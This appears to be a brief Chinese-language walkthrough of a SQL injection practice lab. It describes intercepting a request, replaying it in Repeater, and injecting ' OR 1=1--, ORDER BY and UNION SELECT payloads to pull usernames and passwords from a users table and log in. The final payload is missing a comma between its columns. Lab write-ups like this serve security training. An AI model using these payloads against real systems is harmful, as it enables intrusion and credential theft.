1.首先我们找到一个靶场,可以看到靶场页面有几个模块.
2.
[1]对它进行抓包,
[2]放到Repeater模块
[3]随便注入一些代码
' OR 1=1--
[4] 确定原始查询返回列数为2
order by 2 --
[5]发现两列都可以保存字符串
'UNION SELECT 'av','ab'--
[6]由此查找一些有趣的数据
' UNION SELECT username password FROM users--
[7]查看响应页面
[8] 然后查看响应代码,进行登录,成功进入